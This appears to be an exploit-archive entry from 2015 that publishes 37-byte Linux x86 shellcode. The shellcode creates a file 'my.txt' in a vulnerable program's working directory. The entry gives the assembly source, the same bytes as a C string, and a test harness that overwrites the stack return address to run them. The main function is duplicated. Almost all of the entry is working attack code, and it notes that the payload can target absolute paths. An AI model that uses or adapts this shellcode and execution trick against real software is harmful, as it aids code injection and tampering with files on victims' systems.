Create 'my.txt' Working Directory (37 Bytes)
| EKU-ID: 4745 | CVE: | OSVDB-ID: |
| Author: Mohammad Reza Ramezani | Published: 2015-04-14 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4745 | CVE: | OSVDB-ID: |
| Author: Mohammad Reza Ramezani | Published: 2015-04-14 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* #Title: Create 'my.txt' in present working directory of vulnerable software #Length: 37 bytes #Date: 3 April 2015 #Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+) #Tested On: kali-linux-1.0.6-i386 Section .text global _start _start: push byte 8 pop eax jmp short GoToCall shellcode: pop ebx xor edx, edx mov [ebx + 6], dl push word 0544o pop ecx int 0x80 push byte 1 pop eax xor ebx, ebx int 0x80 GoToCall: call shellcode db 'my.txtX' This shellcode can generalized by using of absolute path instead of 'my.txt' */ char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2""\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58""\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74""\x78\x74\x58"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }